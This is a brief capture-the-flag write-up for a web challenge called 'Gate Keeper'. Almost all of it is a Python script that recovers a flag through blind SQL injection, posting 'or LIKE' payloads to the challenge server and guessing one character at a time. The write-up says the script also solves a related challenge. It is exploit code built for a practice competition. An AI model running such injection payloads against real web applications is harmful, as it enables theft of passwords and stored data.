# Gate Keeper

Author: [roerohan](https://github.com/roerohan)

## Exploit

SQL Injection. This also works for the [Taxi Union](../taxi%20union)
challenge.

```py  
import requests  
import string

flag = ''

print(flag)

domain = string.ascii_lowercase + string.ascii_uppercase + string.digits +
'_}'

f = 0

challenge = "gate keeper"  
url = ""  
check = ""  
key = ""  
column = ""  
if challenge == "taxi union":  
url = 'http://extremely.uniquename.xyz:2052/'  
check = "TN-06-AP-9879"  
key = 'lisence_plate'  
column = "location"  
elif challenge == 'gate keeper':  
url = 'http://extremely.uniquename.xyz:2082/'  
check = "The flag for the CTF is the password you entered.(If you havent
cheated that is)"  
key = 'password'  
column = "password"

print("URL", url)

while True:  
for char in domain:  
payload = "' or {} like '{}%'; --".format(column, flag + char)  
print(payload)

r = requests.post(url, data={key: payload})

if (check in r.text):  
flag = flag + char  
print("Success " + flag)

break  
```

Original writeup (https://github.com/csivitu/CTF-Write-
ups/tree/master/Deconstruct.f/web/gate%20keeper).